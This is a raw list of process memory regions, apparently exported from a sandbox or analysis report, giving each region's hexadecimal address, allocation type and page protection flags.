22CB1791000
|
trusted library allocation
|
page read and write
|
||
|
22CC0499000
|
trusted library allocation
|
page read and write
|
||
|
28D6000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3DC10000
|
trusted library allocation
|
page read and write
|
||
|
786E000
|
stack
|
page read and write
|
||
|
22CB21B1000
|
trusted library allocation
|
page read and write
|
||
|
22CC8690000
|
heap
|
page read and write
|
||
|
25F0000
|
heap
|
page read and write
|
||
|
4DA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFC3DB6C000
|
trusted library allocation
|
page read and write
|
||
|
9E8D000
|
trusted library allocation
|
page read and write
|
||
|
22CB1B1F000
|
trusted library allocation
|
page read and write
|
||
|
9D1000
|
unkown
|
page readonly
|
||
|
7F4000
|
heap
|
page read and write
|
||
|
7FFC3DB90000
|
trusted library allocation
|
page read and write
|
||
|
22CB110B000
|
trusted library allocation
|
page read and write
|
||
|
13D0000
|
trusted library allocation
|
page read and write
|
||
|
6E8000
|
heap
|
page read and write
|
||
|
25AE000
|
trusted library allocation
|
page read and write
|
||
|
22CB2270000
|
trusted library allocation
|
page read and write
|
||
|
1465000
|
heap
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
6BEE000
|
stack
|
page read and write
|
||
|
585F000
|
stack
|
page read and write
|
||
|
DD0000
|
unkown
|
page readonly
|
||
|
C40000
|
unkown
|
page readonly
|
||
|
7FFC3DC30000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFC3DB10000
|
trusted library allocation
|
page read and write
|
||
|
2CA8000
|
trusted library allocation
|
page read and write
|
||
|
22CB1779000
|
trusted library allocation
|
page read and write
|
||
|
12A4000
|
trusted library allocation
|
page read and write
|
||
|
4D80000
|
trusted library allocation
|
page read and write
|
||
|
9A5000
|
heap
|
page read and write
|
||
|
5FBE000
|
stack
|
page read and write
|
||
|
673E000
|
stack
|
page read and write
|
||
|
22CAE7F5000
|
heap
|
page read and write
|
||
|
AEA000
|
trusted library allocation
|
page execute and read and write
|
||
|
10C0000
|
unkown
|
page readonly
|
||
|
22CC89FF000
|
heap
|
page read and write
|
||
|
22CC0782000
|
trusted library allocation
|
page read and write
|
||
|
2921000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3DC00000
|
trusted library allocation
|
page read and write
|
||
|
63E000
|
unkown
|
page read and write
|
||
|
2C43000
|
trusted library allocation
|
page read and write
|
||
|
4C20000
|
trusted library allocation
|
page read and write
|
||
|
22CAE830000
|
trusted library allocation
|
page read and write
|
||
|
2907000
|
trusted library allocation
|
page read and write
|
||
|
4C5B000
|
trusted library allocation
|
page read and write
|
||
|
5DB98B6000
|
stack
|
page read and write
|
||
|
2814000
|
trusted library allocation
|
page read and write
|
||
|
1636000
|
unkown
|
page readonly
|
||
|
4D90000
|
trusted library allocation
|
page read and write
|
||
|
854000
|
heap
|
page read and write
|
||
|
28A3000
|
trusted library allocation
|
page read and write
|
||
|
548E000
|
direct allocation
|
page read and write
|
||
|
28B2000
|
trusted library allocation
|
page read and write
|
||
|
AE2000
|
trusted library allocation
|
page read and write
|
||
|
22CB1027000
|
trusted library allocation
|
page read and write
|
||
|
5470000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3DBB2000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3D980000
|
trusted library allocation
|
page execute and read and write
|
||
|
6A1C000
|
stack
|
page read and write
|
||
|
568D000
|
stack
|
page read and write
|
||
|
7DF43AF80000
|
trusted library allocation
|
page execute and read and write
|
||
|
271E000
|
stack
|
page read and write
|
||
|
4EE1000
|
trusted library allocation
|
page read and write
|
||
|
22CC0784000
|
trusted library allocation
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
82E000
|
stack
|
page read and write
|
||
|
5ACF000
|
trusted library allocation
|
page read and write
|
||
|
C41000
|
unkown
|
page execute read
|
||
|
22CC89F1000
|
heap
|
page read and write
|
||
|
7FFC3D9B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
22CC890F000
|
heap
|
page read and write
|
||
|
B65000
|
unkown
|
page execute read
|
||
|
25C6000
|
trusted library allocation
|
page read and write
|
||
|
75B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
5DB97F8000
|
stack
|
page read and write
|
||
|
8B7000
|
heap
|
page read and write
|
||
|
5C2C000
|
stack
|
page read and write
|
||
|
5D90000
|
heap
|
page read and write
|
||
|
28A5000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3D9F0000
|
trusted library allocation
|
page read and write
|
||
|
68D0000
|
trusted library allocation
|
page read and write
|
||
|
2C36000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
7FFC3DB80000
|
trusted library allocation
|
page read and write
|
||
|
145A000
|
heap
|
page read and write
|
||
|
7FFC3DBD0000
|
trusted library allocation
|
page read and write
|
||
|
5DB9BBB000
|
stack
|
page read and write
|
||
|
2C0A000
|
trusted library allocation
|
page read and write
|
||
|
1490000
|
heap
|
page read and write
|
||
|
22CB1666000
|
trusted library allocation
|
page read and write
|
||
|
284E000
|
trusted library allocation
|
page read and write
|
||
|
1200000
|
heap
|
page read and write
|
||
|
255CBDB8000
|
heap
|
page read and write
|
||
|
95E000
|
stack
|
page read and write
|
||
|
599E000
|
stack
|
page read and write
|
||
|
2942000
|
trusted library allocation
|
page read and write
|
||
|
311C000
|
trusted library allocation
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
BB4000
|
unkown
|
page read and write
|
||
|
255CD7C0000
|
direct allocation
|
page read and write
|
||
|
292C000
|
trusted library allocation
|
page read and write
|
||
|
7DF43AF90000
|
trusted library allocation
|
page execute and read and write
|
||
|
2E60000
|
heap
|
page read and write
|
||
|
86C000
|
stack
|
page read and write
|
||
|
22CB21AE000
|
trusted library allocation
|
page read and write
|
||
|
4F0E000
|
stack
|
page read and write
|
||
|
ABD000
|
heap
|
page read and write
|
||
|
29FC000
|
trusted library allocation
|
page read and write
|
||
|
179D000
|
stack
|
page read and write
|
||
|
6D0000
|
heap
|
page read and write
|
||
|
2EF4000
|
unkown
|
page read and write
|
||
|
5DB95F9000
|
stack
|
page read and write
|
||
|
293A000
|
trusted library allocation
|
page read and write
|
||
|
2A15000
|
trusted library allocation
|
page read and write
|
||
|
6F69000
|
stack
|
page read and write
|
||
|
AC4000
|
trusted library allocation
|
page read and write
|
||
|
9B6000
|
heap
|
page read and write
|
||
|
3020000
|
direct allocation
|
page read and write
|
||
|
6A50000
|
trusted library allocation
|
page execute and read and write
|
||
|
5DB9C3B000
|
stack
|
page read and write
|
||
|
D30000
|
heap
|
page read and write
|
||
|
A40000
|
direct allocation
|
page read and write
|
||
|
25AB000
|
trusted library allocation
|
page read and write
|
||
|
8E1000
|
unkown
|
page execute read
|
||
|
DBE000
|
unkown
|
page readonly
|
||
|
9D1000
|
unkown
|
page readonly
|
||
|
13BE000
|
stack
|
page read and write
|
||
|
3254000
|
unkown
|
page read and write
|
||
|
2A9F000
|
trusted library allocation
|
page read and write
|
||
|
2BF7000
|
trusted library allocation
|
page read and write
|
||
|
53C1000
|
unkown
|
page read and write
|
||
|
2B7D000
|
trusted library allocation
|
page read and write
|
||
|
70ED000
|
stack
|
page read and write
|
||
|
12B0000
|
heap
|
page read and write
|
||
|
7FF7013FC000
|
unkown
|
page readonly
|
||
|
59DE000
|
stack
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
128C000
|
heap
|
page read and write
|
||
|
53C1000
|
unkown
|
page read and write
|
||
|
2851000
|
trusted library allocation
|
page read and write
|
||
|
322F000
|
unkown
|
page read and write
|
||
|
2BEB000
|
trusted library allocation
|
page read and write
|
||
|
6FAE000
|
stack
|
page read and write
|
||
|
22CAE740000
|
heap
|
page read and write
|
||
|
7FFC3D971000
|
trusted library allocation
|
page read and write
|
||
|
29F1000
|
trusted library allocation
|
page read and write
|
||
|
24B2000
|
trusted library allocation
|
page read and write
|
||
|
22CAE628000
|
heap
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
5A30000
|
unkown
|
page read and write
|
||
|
255CD660000
|
heap
|
page read and write
|
||
|
2E6C000
|
heap
|
page read and write
|
||
|
5DB983E000
|
stack
|
page read and write
|
||
|
2C8C000
|
trusted library allocation
|
page read and write
|
||
|
BB4000
|
unkown
|
page read and write
|
||
|
22CC8A45000
|
heap
|
page read and write
|
||
|
17A0000
|
heap
|
page read and write
|
||
|
7F4000
|
heap
|
page read and write
|
||
|
10D0000
|
heap
|
page read and write
|
||
|
3230000
|
unkown
|
page read and write
|
||
|
746E000
|
stack
|
page read and write
|
||
|
98E8000
|
heap
|
page read and write
|
||
|
578F000
|
stack
|
page read and write
|
||
|
25F3000
|
heap
|
page read and write
|
||
|
2B72000
|
trusted library allocation
|
page read and write
|
||
|
22CAE657000
|
heap
|
page read and write
|
||
|
22CB165A000
|
trusted library allocation
|
page read and write
|
||
|
7FFC3DAE0000
|
trusted library allocation
|
page read and write
|
||
|
29E5000
|
trusted library allocation
|
page read and write
|
||
|
DAC000
|
unkown
|
page readonly
|
||
|
7FFC3D7C3000
|
trusted library allocation
|
page execute and read and write
|
||
|
BB4000
|
unkown
|
page read and write
|
||
|
27D2000
|
trusted library allocation
|
page read and write
|
||
|
1601000
|
unkown
|
page execute read
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
22CC8973000
|
heap
|
page read and write
|
||
|
854000
|
heap
|
page read and write
|
||
|
175E000
|
stack
|
page read and write
|
||
|
53C1000
|
unkown
|
page read and write
|
||
|
5419000
|
direct allocation
|
page read and write
|
||
|
22CB21A8000
|
trusted library allocation
|
page read and write
|
||
|
1271000
|
heap
|
page read and write
|
||
|
97E000
|
stack
|
page read and write
|
||
|
3254000
|
unkown
|
page read and write
|
||
|
650000
|
unkown
|
page write copy
|
||
|
22CB18A7000
|
trusted library allocation
|
page read and write
|
||
|
11A1000
|
heap
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
A2C0000
|
unkown
|
page read and write
|
||
|
53C1000
|
unkown
|
page read and write
|
||
|
ADD000
|
trusted library allocation
|
page execute and read and write
|
||
|
6E10000
|
trusted library allocation
|
page execute and read and write
|
||
|
22CC895B000
|
heap
|
page read and write
|
||
|
22CAE6BF000
|
heap
|
page read and write
|
||
|
D79000
|
unkown
|
page write copy
|
||
|
2560000
|
trusted library allocation
|
page execute and read and write
|
||
|
CA510FC000
|
stack
|
page read and write
|
||
|
30ED000
|
stack
|
page read and write
|
||
|
22CB2282000
|
trusted library allocation
|
page read and write
|
||
|
2AFA000
|
trusted library allocation
|
page read and write
|
||
|
22CAE890000
|
heap
|
page read and write
|
||
|
9765000
|
heap
|
page read and write
|
||
|
7F4000
|
heap
|
page read and write
|
||
|
71EC000
|
stack
|
page read and write
|
||
|
258C000
|
trusted library allocation
|
page read and write
|
||
|
7FF7013F8000
|
unkown
|
page readonly
|
||
|
1270000
|
heap
|
page read and write
|
||
|
AC3000
|
trusted library allocation
|
page execute and read and write
|
||
|
854000
|
heap
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
FF6D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B67000
|
trusted library allocation
|
page read and write
|
||
|
7FF7013E0000
|
unkown
|
page readonly
|
||
|
22CC8A37000
|
heap
|
page read and write
|
||
|
776E000
|
stack
|
page read and write
|
||
|
9A4000
|
unkown
|
page read and write
|
||
|
A30000
|
unkown
|
page read and write
|
||
|
9B0000
|
heap
|
page read and write
|
||
|
691C000
|
stack
|
page read and write
|
||
|
7FFC3D876000
|
trusted library allocation
|
page read and write
|
||
|
564E000
|
unkown
|
page read and write
|
||
|
2841000
|
trusted library allocation
|
page read and write
|
||
|
22CC04F4000
|
trusted library allocation
|
page read and write
|
||
|
5DBA70D000
|
stack
|
page read and write
|
||
|
73F000
|
heap
|
page read and write
|
||
|
4C80000
|
trusted library allocation
|
page read and write
|
||
|
6A20000
|
heap
|
page read and write
|
||
|
22CB0481000
|
trusted library allocation
|
page read and write
|
||
|
22CB24D0000
|
trusted library allocation
|
page read and write
|
||
|
7FF7013C0000
|
unkown
|
page readonly
|